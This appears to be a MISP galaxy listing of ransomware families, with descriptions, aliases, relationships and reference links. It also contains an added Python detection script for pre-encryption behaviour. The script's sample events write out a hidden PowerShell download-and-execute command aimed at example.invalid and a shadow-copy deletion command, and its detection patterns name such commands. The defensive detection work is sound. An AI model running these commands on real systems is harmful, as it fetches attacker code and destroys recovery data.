  • Cripttor

Table 8544. Table References

Links

https://www.coveware.com/blog/2019/3/13/cr1ptt0r-ransomware-targets-nas-devices-with-old-firmware

https://malpedia.caad.fkie.fraunhofer.de/details/elf.cr1ptt0r

Sodinokibi

Attackers are actively exploiting a recently disclosed vulnerability in Oracle WebLogic to install a new variant of ransomware called "Sodinokibi." Sodinokibi attempts to encrypt data in a user’s directory and delete shadow copy backups to make data recovery more difficult. Oracle first patched the issue on April 26, outside of their normal patch cycle, and assigned it CVE-2019-2725. This vulnerability is easy for attackers to exploit, as anyone with HTTP access to the WebLogic server could carry out an attack. Because of this, the bug has a CVSS score of 9.8/10. Attackers have been making use of this exploit in the wild since at least April 17. Cisco’s Incident Response (IR) team, along with Cisco Talos, are actively investigating these attacks and Sodinokibi.

The tag is: misp-galaxy:ransomware="Sodinokibi"

Sodinokibi is also known as:

  • REvil

  • Revil

Table 8545. Table References

Links

https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html

Phobos

Phobos exploits open or poorly secured RDP ports to sneak inside networks and execute a ransomware attack, encrypting files and demanding a ransom be paid in bitcoin for returning the files, which in this case are locked with a .phobos extension.

The tag is: misp-galaxy:ransomware="Phobos"

Phobos is also known as:

  • Java NotDharma

Table 8546. Table References

Links

https://www.zdnet.com/article/new-phobos-ransomware-exploits-weak-security-to-hit-targets-around-the-world/

GetCrypt

GetCrypt is a ransomware delivered by the RIG exploit kit, to which victims are redirected; once run it encrypts the files on the device.

The tag is: misp-galaxy:ransomware="GetCrypt"

Table 8547. Table References

Links

https://www.ehackingnews.com/2019/05/getcrypt-ransomware-modus-operandi-and.html

Nemty

A new ransomware family dubbed “Nemty” for the extension it adds to encrypted files has recently surfaced in the wild. According to a report from Bleeping Computer, New York-based reverse engineer Vitali Kremez posits that Nemty is possibly delivered through exposed remote desktop connections.

The tag is: misp-galaxy:ransomware="Nemty"

Nemty has relationships with:

  • related-to: misp-galaxy:ransomware="Nefilim" with estimative-language:likelihood-probability="likely"

Table 8548. Table References

Links

https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/nemty-ransomware-possibly-spreads-through-exposed-remote-desktop-connections

Buran

Buran is a new version of the Vega ransomware strain (a.k.a. Jamper, Ghost, Buhtrap) that attacked accountants from February through April 2019. The new Buran ransomware first was discovered by nao_sec in June 2019, delivered by the RIG Exploit Kit, as reported by BleepingComputer.

The tag is: misp-galaxy:ransomware="Buran"

Table 8549. Table References

Links

https://www.acronis.com/en-us/blog/posts/meet-buran-new-delphi-ransomware-delivered-rig-exploit-kit

Hildacrypt

The Hildacrypt ransomware encrypts the victim’s files with a strong encryption algorithm and the filename extension .hilda until the victim pays a fee to get them back.

The tag is: misp-galaxy:ransomware="Hildacrypt"

Table 8550. Table References

Links

https://securitynews.sonicwall.com/xmlpost/hildacrypt-ransomware-actively-spreading-in-the-wild/

Mr.Dec

Mr.Dec is a crypto-ransomware first spotted in mid-May 2018 and updated multiple times since. It encrypts all personal data on the device with the AES algorithm and appends an extension of the form .[ID]<16 random characters>[ID], preventing further use of the files.

The tag is: misp-galaxy:ransomware="Mr.Dec"

Mr.Dec is also known as:

  • MrDec

  • Sherminator

Table 8551. Table References

Links

https://www.2-spyware.com/remove-mr-dec-ransomware.html

https://id-ransomware.blogspot.com/2018/05/mrdec-ransomware.html

Freeme

Freeme (also called Freezing) is a crypto-ransomware that encrypts user data using AES and then demands a ransom in BTC (amount not stated) to return the files. No original name is given in the ransom note; the executable is named FreeMe.exe.

The tag is: misp-galaxy:ransomware="Freeme"

Freeme is also known as:

  • Freezing

Table 8552. Table References

Links

http://id-ransomware.blogspot.com/2019/06/freeme-freezing-ransomware.html

DoppelPaymer

We have dubbed this new ransomware DoppelPaymer because it shares most of its code with the BitPaymer ransomware operated by INDRIK SPIDER. However, there are a number of differences between DoppelPaymer and BitPaymer, which may signify that one or more members of INDRIK SPIDER have split from the group and forked the source code of both Dridex and BitPaymer to start their own Big Game Hunting ransomware operation.

The tag is: misp-galaxy:ransomware="DoppelPaymer"

DoppelPaymer is also known as:

  • Pay OR Grief

  • BitPaymer

  • IEncrypt

  • FriedEx

Table 8553. Table References

Links

https://www.crowdstrike.com/blog/doppelpaymer-ransomware-and-dridex-2/

https://malpedia.caad.fkie.fraunhofer.de/details/win.doppelpaymer

Desync

This crypto-ransomware encrypts enterprise LAN data with AES (ECB mode) and then demands a ransom in BTC (amount not stated) to return the files.

The tag is: misp-galaxy:ransomware="Desync"

Table 8554. Table References

Links

https://id-ransomware.blogspot.com/2019/01/unnamed-desync-ransomware.html

Maze

Maze Ransomware encrypts files and makes them inaccessible while adding a custom extension containing part of the ID of the victim. The ransom note is placed inside a text file and an htm file. There are a few different extensions appended to files which are randomly generated.

The tag is: misp-galaxy:ransomware="Maze"

Maze has relationships with:

  • related-to: misp-galaxy:ransomware="Ragnar Locker" with estimative-language:likelihood-probability="likely"

Table 8555. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.maze

https://www.bleepingcomputer.com/news/security/maze-ransomware-now-delivered-by-spelevo-exploit-kit/

https://www.proofpoint.com/us/threat-insight/post/ta2101-plays-government-imposter-distribute-malware-german-italian-and-us

Cyborg Ransomware

Ransomware delivered using fake Windows Update spam.

The tag is: misp-galaxy:ransomware="Cyborg Ransomware"

Table 8556. Table References

Links

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/fake-windows-update-spam-leads-to-cyborg-ransomware-and-its-builder/

FTCode

A targeted email campaign has been spotted distributing the JasperLoader to victims. While the JasperLoader was originally used to then install Gootkit, Certego has observed it now being used to infect victims with a new ransomware dubbed FTCODE. Using an invoice-themed email appearing to target Italian users, the attackers attempt to convince users to allow macros in a Word document. The macro is used to run PowerShell to retrieve additional PowerShell code.

The tag is: misp-galaxy:ransomware="FTCode"

Table 8557. Table References

Links

https://www.certego.net/en/news/malware-tales-ftcode/

https://exchange.xforce.ibmcloud.com/collection/FTCODE-Ransomware-45dacdc2d5cf30722ced20b9d37988c2

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.ftcode

Clop

First observed in February 2019; a variant of the CryptoMix family, itself derived from the CryptXXX and CryptoWall families.

The tag is: misp-galaxy:ransomware="Clop"

Table 8558. Table References

Links

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf

https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/

PornBlackmailer

A new infection is being distributed by porn sites that tries to blackmail a victim into paying a ransom by stating they will tell law enforcement that the victim is spreading child porn. This is done by collecting information about the user, including screen shots of their active desktop, in order to catch them in compromising situations.

The tag is: misp-galaxy:ransomware="PornBlackmailer"

Table 8559. Table References

Links

https://www.bleepingcomputer.com/news/security/blackmailware-found-on-porn-site-threatens-to-report-users-are-spreading-child-porn/

KingOuroboros

This crypto-ransomware encrypts user data using AES and then demands $30, $50 or $80 in BTC to return the files. The name is the one the malware uses for itself. Written in AutoIt.

The tag is: misp-galaxy:ransomware="KingOuroboros"

Table 8560. Table References

Links

https://id-ransomware.blogspot.com/2018/06/kingouroboros-ransomware.html

MAFIA Ransomware

The ransomware appears to target users in Korea, and may have been developed with at least knowledge of the Korean language.

The tag is: misp-galaxy:ransomware="MAFIA Ransomware"

MAFIA Ransomware is also known as:

  • Mafia

Table 8561. Table References

Links

https://bartblaze.blogspot.com/2018/08/mafia-ransomware-targeting-users-in.html

5ss5c Ransomware

The cybercrime group that brought us Satan, DBGer and Lucky ransomware and perhaps Iron ransomware, has now come up with a new version or rebranding named 5ss5c. [...] It will however only encrypt files with the following extensions: 7z, bak, cer, csv, db, dbf, dmp, docx, eps, ldf, mdb, mdf, myd, myi, ora, pdf, pem, pfx, ppt, pptx, psd, rar, rtf, sql, tar, txt, vdi, vmdk, vmx, xls, xlsx, zip

The tag is: misp-galaxy:ransomware="5ss5c Ransomware"

Table 8562. Table References

Links

https://bartblaze.blogspot.com/2020/01/satan-ransomware-rebrands-as-5ss5c.html

Nodera Ransomware

Nodera is a ransomware family that uses the Node.js framework and was discovered by Quick Heal researchers. The infection chain starts with a VBS script embedded with multiple JavaScript files. Upon execution, a directory is created and both the main node.exe program and several required NodeJS files are downloaded into the directory. Additionally, a malicious JavaScript payload that performs the encryption process is saved in this directory. After checking that it has admin privileges and setting applicable variables, the malicious JavaScript file enumerates the drives to create a list of targets. Processes associated with common user file types are stopped and volume shadow copies are deleted. Finally, all user-specific files on the C: drive and all files on other drives are encrypted and are appended with a .encrypted extension. The ransom note containing instructions on paying the Bitcoin ransom is provided along with a batch script to be used for decryption after obtaining the private key. Some mistakes in the ransom note identified by the researchers include the fact that it mentions a 2048-bit RSA public key instead of 4096-bit (the size that was actually used), a hard-coded private key destruction time almost two years in the past, and a lack of instructions for how the private key will be obtained after the ransom is paid. These are signs that the ransomware may be in the development phase and was likely written by an amateur. For more information, see the QuickHeal blog post in the Reference section below.

The tag is: misp-galaxy:ransomware="Nodera Ransomware"

Nodera Ransomware is also known as:

  • Nodera

Table 8563. Table References

Links

https://exchange.xforce.ibmcloud.com/collection/6f18908ce6d9cf4efb551911e00d9ec4

https://blogs.quickheal.com/first-node-js-based-ransomware-nodera/
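Several entries above describe pre-encryption behaviour that is visible in process-creation telemetry: Sodinokibi and Nodera delete volume shadow copies, FTCode's macro launches PowerShell to fetch further PowerShell, and Nodera runs node.exe from a directory it created under the user profile. The following added example (not code from the MISP galaxy or any of the referenced reports) runs a few such rules over constructed event records shaped like the ParentImage / Image / CommandLine fields of Windows 4688 or Sysmon Event ID 1 logs, including two benign events that the rules must not flag; the hostnames, paths and the example.invalid URL are made up for illustration.

```python
"""Triage Windows process-creation events for pre-encryption behaviour.

Added example, not code from the MISP galaxy or the referenced reports.
EVENTS is constructed to resemble the ParentImage / Image / CommandLine
fields of Security 4688 or Sysmon Event ID 1 records; hosts, paths and the
example.invalid URL are made up.
"""

import re

EVENTS = [
    {"host": "WS01",  # FTCode-style: Word macro starts PowerShell with a download cradle
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -c \"IEX (New-Object "
                "Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')\""},
    {"host": "WS01",  # Sodinokibi/Nodera-style: shadow copies removed before encryption
     "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe Delete Shadows /All /Quiet"},
    {"host": "WS02",  # Nodera-style: node.exe dropped under the profile runs a script
     "parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Users\alice\AppData\Roaming\nodejs\node.exe",
     "cmdline": r"node.exe C:\Users\alice\AppData\Roaming\nodejs\lib\encrypt.js"},
    {"host": "SRV01",  # benign: backup agent only enumerating shadow copies
     "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe List Shadows"},
    {"host": "WS03",  # benign: admin running a local script from Explorer
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\inventory.ps1"},
]

# Command lines that remove or disable the recovery data ransomware wants gone.
SHADOW_COPY_TAMPERING = [
    re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I),
    re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.I),
    re.compile(r"wbadmin(\.exe)?\s+delete\s+(catalog|systemstatebackup)", re.I),
    re.compile(r"Win32_ShadowCopy.*\.Delete\(", re.I),
    re.compile(r"bcdedit(\.exe)?\s+/set\s+\{default\}\s+recoveryenabled\s+no", re.I),
]
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
# Download cradles and long base64 -EncodedCommand payloads.
DOWNLOAD_CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|"
    r"-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I)
# Locations a standard user can write to and drop a runtime into.
USER_WRITABLE = re.compile(
    r"\\Users\\[^\\]+\\(AppData|Downloads|Desktop|Documents)\\|\\ProgramData\\|\\Temp\\",
    re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def triage(event):
    """Return the list of rule names the event trips (empty for benign events)."""
    hits = []
    cmd = event["cmdline"]
    if any(rule.search(cmd) for rule in SHADOW_COPY_TAMPERING):
        hits.append("shadow-copy-tampering")
    if basename(event["parent"]) in OFFICE_APPS and basename(event["image"]) in SCRIPT_HOSTS:
        hits.append("office-spawned-script-host")
        if DOWNLOAD_CRADLE.search(cmd):
            hits.append("download-cradle")
    if basename(event["image"]) == "node.exe" and USER_WRITABLE.search(event["image"]):
        hits.append("node-runtime-in-user-writable-path")
    return hits


def run(events):
    """Return (host, image, hits) for every event that trips at least one rule."""
    results = []
    for event in events:
        hits = triage(event)
        if hits:
            results.append((event["host"], basename(event["image"]), hits))
    return results


if __name__ == "__main__":
    for host, image, hits in run(EVENTS):
        print(f"{host}: {image} -> {', '.join(hits)}")
```

The shadow-copy rule matches on the command line rather than the image name because the same deletion can be issued through vssadmin, wmic, wbadmin, WMI from PowerShell or bcdedit; the parent/child rule stays specific by requiring an Office parent, so ordinary administrative PowerShell launched from Explorer is not flagged.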

MegaCortex

Discovered in May 2019. Dropped on networks already compromised by trojans such as Emotet or TrickBot. The tools and methods used are similar to LockerGoga's.

The tag is: misp-galaxy:ransomware="MegaCortex"

MegaCortex has relationships with:

  • similar: misp-galaxy:ransomware="LockerGoga" with estimative-language:likelihood-probability="roughly-even-chance"

Table 8564. Table References

Links

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf

RobinHood

Detected in April 2019. Known for paralyzing the cities of Baltimore and Greenville. Probably also exfiltrates data.

The tag is: misp-galaxy:ransomware="RobinHood"

RobinHood is also known as:

  • HelpYemen

Table 8565. Table References

Links

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf

Bart ransomware

Bart ransomware is distributed by the same Russian cybercrime group behind Dridex 220 and Locky. Bart does not communicate with a command and control (C&C) server, so it can encrypt files without an Internet connection. Bart is spread to end users via phishing emails containing .zip attachments with JavaScript code, using social engineering to trick users into opening the 'photo' attachments. The zipped files are obfuscated to make it harder to tell what actions they perform. If opened, these attachments download and install the intermediary loader RockLoader, which downloads Bart onto the machine over HTTPS. Once executed, it first checks the language of the infected computer. If the malware detects Russian, Belarusian or Ukrainian, the ransomware terminates and does not proceed with the infection. For any other language, it starts scanning the computer for certain file extensions to encrypt. Because Bart does not require communication with C&C infrastructure before encrypting files, it could encrypt machines sitting behind corporate firewalls that would otherwise block such traffic. Thus, organizations need to ensure that Bart is blocked at the email gateway using rules that block zipped executables.

The tag is: misp-galaxy:ransomware="Bart ransomware"

Bart ransomware is also known as:

  • Locky Bart

Table 8566. Table References

Links

https://www.knowbe4.com/bart-ransomware

Razor

Razor was discovered by dnwls0719 and is part of the Garrantydecrypt ransomware family. Like many other programs of this type, Razor is designed to encrypt files (making them unusable/inaccessible), change their filenames, create a ransom note and change the victim's desktop wallpaper. Razor renames files by appending the ".razor" extension to their filenames; for example, "1.jpg" becomes "1.jpg.razor". It creates a ransom note, a text file named "RECOVERY.txt", containing instructions on how to contact Razor's developers (cyber criminals) and other details. As stated in "RECOVERY.txt", this ransomware encrypts all files, and information on how to purchase a decryption tool can be obtained by contacting the developers via razor2020@protonmail.ch, Jabber (razor2020@jxmpp.jp) or ICQ (@razor2020) and waiting for further instructions. They will very likely name a price for the decryption tool and/or key and provide a cryptocurrency wallet address for the payment. However, it is never a good idea to trust (pay) cyber criminals/ransomware developers; it is common that they do not provide decryption tools even after payment. Another problem is that ransomware-type programs encrypt files with strong encryption algorithms and their developers are the only ones with tools that can decrypt them. In most cases the only free and safe option for victims is to restore files from a backup. Files remain encrypted even after the ransomware is uninstalled; its removal only prevents further encryption.

The tag is: misp-galaxy:ransomware="Razor"

Table 8567. Table References

Links

https://www.pcrisk.com/removal-guides/17016-razor-ransomware

Wadhrama

The tag is: misp-galaxy:ransomware="Wadhrama"

Wadhrama has relationships with:

  • used-by: misp-galaxy:microsoft-activity-group="PARINACOTA" with estimative-language:likelihood-probability="likely"

  • used-by: misp-galaxy:threat-actor="PARINACOTA" with estimative-language:likelihood-probability="likely"

Table 8568. Table References

Links

https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=ransom:win32/wadhrama.c&ThreatID=2147730655

Mespinoza

Mespinoza ransomware has been in use since at least October 2018. The first versions used the common extension ".locked". Since December 2019 a new version has been open sourced and documented; this new version uses the ".pyza" extension.

The tag is: misp-galaxy:ransomware="Mespinoza"

Mespinoza is also known as:

  • Pyza

  • Pysa

Table 8569. Table References

Links

https://www.cert.ssi.gouv.fr/cti/CERTFR-2020-CTI-002/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-002.pdf

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-003.pdf

CoronaVirus

A new ransomware called CoronaVirus has been distributed through a fake web site pretending to promote the system optimization software and utilities from WiseCleaner. With the increasing fears and anxiety of the Coronavirus (COVID-19) outbreak, an attacker has started to build a campaign to distribute a malware cocktail consisting of the CoronaVirus Ransomware and the Kpot information-stealing Trojan. This new ransomware was discovered by MalwareHunterTeam and after further digging into the source of the file, we have been able to determine how the threat actor plans on distributing the ransomware and possible clues suggesting that it may actually be a wiper.

The tag is: misp-galaxy:ransomware="CoronaVirus"

Table 8570. Table References

Links

https://www.bleepingcomputer.com/news/security/new-coronavirus-ransomware-acts-as-cover-for-kpot-infostealer/

Snake Ransomware

Snake ransomware first attracted the attention of malware analysts in January 2020 when they observed the crypto-malware family targeting entire corporate networks. Shortly after this discovery, the threat quieted down. It produced few new detected infections in the wild for the next few months. That was until May 4, when ID Ransomware registered a sudden spike in submissions for the ransomware.

The tag is: misp-galaxy:ransomware="Snake Ransomware"

Table 8571. Table References

Links

https://www.cybersecurity-insiders.com/meet-the-snake-ransomware-which-encrypts-all-connected-devices/

https://www.tripwire.com/state-of-security/security-data-protection/massive-spike-in-snake-ransomware-activity-attributed-to-new-campaign/

https://www.bleepingcomputer.com/news/security/large-scale-snake-ransomware-campaign-targets-healthcare-more/

eCh0raix

Anomali researchers have observed a new ransomware family, dubbed eCh0raix, targeting QNAP Network Attached Storage (NAS) devices. QNAP devices are created by the Taiwanese company QNAP Systems, Inc., and contain device storage and media player functionality, amongst others. The devices appear to be compromised by brute forcing weak credentials and exploiting known vulnerabilities in targeted attacks. The malicious payload encrypts the targeted file extensions on the NAS using AES encryption and appends the .encrypt extension to the encrypted files. eCh0raix was first seen in June 2019, after victims began reporting ransomware attacks in a forum topic on BleepingComputer. On June 1st, 2020, there was a sudden surge of eCh0raix victims seeking help in our forums and submissions to the ransomware identification site ID-Ransomware.

The tag is: misp-galaxy:ransomware="eCh0raix"

Table 8572. Table References

Links

https://www.bleepingcomputer.com/news/security/ongoing-ech0raix-ransomware-campaign-targets-qnap-nas-devices/

https://www.anomali.com/blog/the-ech0raix-ransomware

Egregor

The threat group behind this malware seems to operate by hacking into companies, stealing sensitive data, and then running Egregor to encrypt all the files. According to the ransom note, if the ransom is not paid by the company within 3 days, then, aside from leaking part of the stolen data, they will distribute it via mass media so that the company’s partners and clients will know that the company was attacked.

The tag is: misp-galaxy:ransomware="Egregor"

Egregor has relationships with:

  • variant-of: misp-galaxy:ransomware="Sekhmet" with estimative-language:likelihood-probability="likely"

Table 8573. Table References

Links

https://www.appgate.com/news-press/appgate-labs-analyzes-new-family-of-ransomware-egregor

https://www.bleepingcomputer.com/news/security/crytek-hit-by-egregor-ransomware-ubisoft-data-leaked/

https://cybersecuritynews.com/egregor-ransomware/

https://securityboulevard.com/2020/10/egregor-sekhmets-cousin/

SunCrypt

SunCrypt ransomware was discovered in October 2019 and in August 2020 it was added to Maze ransomware’s cartel. It also follows some of Maze’s tactics, techniques, and procedures. SunCrypt is launched and installed using an obfuscated PowerShell script. Infected email attachments (macros), torrent websites, malicious ads act as carriers for this ransomware.

The tag is: misp-galaxy:ransomware="SunCrypt"

SunCrypt is also known as:

  • Sun

  • Suncrypt

Table 8574. Table References

Links

https://www.acronis.com/en-us/blog/posts/suncrypt-adopts-attacking-techniques-netwalker-and-maze-ransomware

https://www.bleepingcomputer.com/news/security/suncrypt-ransomware-sheds-light-on-the-maze-ransomware-cartel/

https://securityboulevard.com/2020/09/the-curious-case-of-suncrypt/

LockBit

LockBit operators tend to be very indiscriminate and opportunistic in their targeting. Actors behind this attack will use a variety of methods to gain initial access, up to and including basic methods such as brute force. After gaining initial access the actor follows a fairly typical escalation, lateral movement and ransomware execution playbook. LockBit operators tend to have a very brief dwell time, executing the final ransomware payload as quickly as they are able to. LockBit ransomware has built-in lateral movement features, given adequate permissions throughout the targeted environment.

The tag is: misp-galaxy:ransomware="LockBit"

LockBit is also known as:

  • ABCD ransomware

LockBit has relationships with:

  • similar: misp-galaxy:ransomware="Lockbit3" with estimative-language:likelihood-probability="likely"

Table 8575. Table References

Links

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/tales-from-the-trenches-a-lockbit-ransomware-story/

https://usa.kaspersky.com/resource-center/threats/lockbit-ransomware

WastedLocker

WastedLocker primarily targets corporate networks. Upon initial compromise, often using a fake browser update containing SocGholish, the actor then takes advantage of dual-use and LoLBin tools in an attempt to evade detection. Key observations include lateral movement and privilege escalation. The WastedLocker ransomware has been tied back to EvilCorp.

The tag is: misp-galaxy:ransomware="WastedLocker"

Table 8576. Table References

Links

https://blogs.cisco.com/security/talos/wastedlocker-goes-big-game-hunting-in-2020

https://blog.malwarebytes.com/threat-spotlight/2020/07/threat-spotlight-wastedlocker-customized-ransomware/

https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/

Babuk Ransomsware

Since this is the first detection of this malware in the wild, it’s not surprising that Babuk is not obfuscated at all. Overall, it’s a pretty standard ransomware that utilizes some of the new techniques we see, such as multi-threaded encryption as well as abusing the Windows Restart Manager, similar to Conti and REvil. For its encryption scheme, Babuk uses its own implementation of SHA256 hashing, ChaCha8 encryption, and the Elliptic-curve Diffie–Hellman (ECDH) key generation and exchange algorithm to protect its keys and encrypt files. Like many ransomware families that came before, it also has the ability to spread its encryption by enumerating the available network resources.

The tag is: misp-galaxy:ransomware="Babuk Ransomsware"

Table 8577. Table References

Links

http://chuongdong.com//reverse%20engineering/2021/01/03/BabukRansomware/

Darkside

Darkside, the latest ransomware operation to emerge has been attacking organizations beginning earlier this month. Darkside’s customized attacks on companies have already garnered them million-dollar payouts. Through their “press release”, these threat actors have claimed to be affiliated with prior ransomware operations making millions of dollars. They stated that they created this new product to match their needs, as prior products didn’t. Darkside explains that they only target companies they know that can pay the specified ransom. They have allegedly promised that they will not attack the following sectors. They include medicine, education, non-profit organizations, and the government sector.

The tag is: misp-galaxy:ransomware="Darkside"

Darkside is also known as:

  • BlackMatter

Table 8578. Table References

Links

https://www.digitalshadows.com/blog-and-research/darkside-the-new-ransomware-group-behind-highly-targeted-attacks/

https://www.wired.com/story/ransomware-gone-corporate-darkside-where-will-it-end/

https://darksidedxcftmqa.onion.foundation/

RansomEXX

We recently discovered a new file-encrypting Trojan built as an ELF executable and intended to encrypt data on machines controlled by Linux-based operating systems. After the initial analysis we noticed similarities in the code of the Trojan, the text of the ransom notes and the general approach to extortion, which suggested that we had in fact encountered a Linux build of the previously known ransomware family RansomEXX. This malware is notorious for attacking large organizations and was most active earlier this year. RansomEXX is a highly targeted Trojan. Each sample of the malware contains a hardcoded name of the victim organization. Moreover, both the encrypted file extension and the email address for contacting the extortionists make use of the victim’s name.

The tag is: misp-galaxy:ransomware="RansomEXX"

RansomEXX is also known as:

  • Ransom X

  • Defray777

  • Defray-777

  • Defray 2018

Table 8579. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomexx

https://id-ransomware.blogspot.com/2020/06/ransomexx-ransomware.html

https://github.com/Bleeping/Ransom.exx

https://www.bleepingcomputer.com/news/security/new-ransom-x-ransomware-used-in-texas-txdot-cyberattack/

https://www.bleepingcomputer.com/news/security/brazils-court-system-under-massive-ransomexx-ransomware-attack/

https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/4/

https://securelist.com/ransomexx-trojan-attacks-linux-systems/99279/

CovidLock

Mobile ransomware. The Zscaler ThreatLabZ team recently came across a URL named hxxp://coronavirusapp[.]site/mobile.html, which portrays itself as a download site for an Android app that tracks the coronavirus spread across the globe. In reality, the app is Android ransomware, which locks out the victim and asks for a ransom to unlock the device. The app portrays itself as a Coronavirus Tracker. As soon as it starts running, it asks the user for several authorizations, including admin rights. In fact, this ransomware neither encrypts nor steals anything and only locks the device with a hard-coded code.

The tag is: misp-galaxy:ransomware="CovidLock"

Table 8580. Table References

Links

https://www.zscaler.com/blogs/security-research/covidlock-android-ransomware-walkthrough-and-unlocking-routine

Tycoon

This malware is written in Java and is named after references in the code. Tycoon has been in the wild since December 2019 and has targeted organizations in the education, SMBs, and software industries. Tycoon is a multi-platform Java ransomware that targets Windows and Linux systems. This ransomware denies access to the system administrator following an attack on the domain controller and file servers. The initial intrusion occurs through an internet-facing remote desktop protocol (RDP) jump-server.

The tag is: misp-galaxy:ransomware="Tycoon"

Table 8581. Table References

Links

https://cyberflorida.org/threat-advisory/tycoon-ransomware/

https://usf.app.box.com/s/83xh0t5w99klrsoisorir7kgs14o972s

Ragnar Locker

Ragnar Locker is a ransomware identified in December 2019 that targets corporate networks in Big Game Hunting targeted attacks. This report presents recent elements regarding this ransomware.

The tag is: misp-galaxy:ransomware="Ragnar Locker"

Ragnar Locker is also known as:

  • RagnarLocker

Ragnar Locker has relationships with:

  • similar: misp-galaxy:mitre-malware="Ragnar Locker - S0481" with estimative-language:likelihood-probability="likely"

Table 8582. Table References

Links

https://www.bleepingcomputer.com/news/security/ragnar-locker-ransomware-targets-msp-enterprise-support-tools/

https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/

https://www.cybersecurity-insiders.com/ransomware-attack-makes-cwt-pay-4-5-million-in-bitcoins-to-hackers/

Sekhmet

Ransom.Sekhmet not only encrypts a victim’s files, but also threatens to publish them.

The tag is: misp-galaxy:ransomware="Sekhmet"

Sekhmet has relationships with:

  • similar: misp-galaxy:ransomware="Egregor" with estimative-language:likelihood-probability="likely"

Table 8583. Table References

Links

https://www.bleepingcomputer.com/news/security/maze-ransomware-is-shutting-down-its-cybercrime-operation/

https://www.zdnet.com/article/as-maze-ransomware-group-retires-clients-turn-to-sekhmet-ransomware-spin-off-egregor/

https://blog.malwarebytes.com/detections/ransom-sekhmet/

https://securityboulevard.com/2020/10/egregor-sekhmets-cousin/

$$$

Ransomware

The tag is: misp-galaxy:ransomware="$$$"

$ucyLocker

Ransomware

The tag is: misp-galaxy:ransomware="$ucyLocker"

10001

Ransomware

The tag is: misp-galaxy:ransomware="10001"

05250lock

Ransomware

The tag is: misp-galaxy:ransomware="05250lock"

0kilobypt

Ransomware

The tag is: misp-galaxy:ransomware="0kilobypt"

1337-Locker

Ransomware

The tag is: misp-galaxy:ransomware="1337-Locker"

24H

Ransomware

The tag is: misp-galaxy:ransomware="24H"

3nCRY

Ransomware

The tag is: misp-galaxy:ransomware="3nCRY"

4rw5w

Ransomware

The tag is: misp-galaxy:ransomware="4rw5w"

5ss5c(5ss5cCrypt)

Ransomware

The tag is: misp-galaxy:ransomware="5ss5c(5ss5cCrypt)"

777(Legion)

Ransomware

The tag is: misp-galaxy:ransomware="777(Legion)"

7h9r

Ransomware

The tag is: misp-galaxy:ransomware="7h9r"

7z Portuguese

Ransomware

The tag is: misp-galaxy:ransomware="7z Portuguese"

AAC

Ransomware

The tag is: misp-galaxy:ransomware="AAC"

ABCLocker

Ransomware

The tag is: misp-galaxy:ransomware="ABCLocker"

Adonis

Ransomware

The tag is: misp-galaxy:ransomware="Adonis"

AepCrypt

Ransomware

The tag is: misp-galaxy:ransomware="AepCrypt"

AES-Matrix

Ransomware

The tag is: misp-galaxy:ransomware="AES-Matrix"

AES-NI: April Edition

Ransomware

The tag is: misp-galaxy:ransomware="AES-NI: April Edition"

Afrodita

Ransomware

The tag is: misp-galaxy:ransomware="Afrodita"

Alco

Ransomware

The tag is: misp-galaxy:ransomware="Alco"

AllCry

Ransomware

The tag is: misp-galaxy:ransomware="AllCry"

AlldataLocker

Ransomware

The tag is: misp-galaxy:ransomware="AlldataLocker"

Amnesia

Ransomware

The tag is: misp-galaxy:ransomware="Amnesia"

Amnesia-2

Ransomware

The tag is: misp-galaxy:ransomware="Amnesia-2"

Anatova

Ransomware

The tag is: misp-galaxy:ransomware="Anatova"

AnDROid

Ransomware

The tag is: misp-galaxy:ransomware="AnDROid"

AngryKite

Ransomware

The tag is: misp-galaxy:ransomware="AngryKite"

AnimusLocker

Ransomware

The tag is: misp-galaxy:ransomware="AnimusLocker"

Annabelle

Ransomware

The tag is: misp-galaxy:ransomware="Annabelle"

Annabelle 2.1

Ransomware

The tag is: misp-galaxy:ransomware="Annabelle 2.1"

AnonCrack

Ransomware

The tag is: misp-galaxy:ransomware="AnonCrack"

AnonPop

Ransomware

The tag is: misp-galaxy:ransomware="AnonPop"

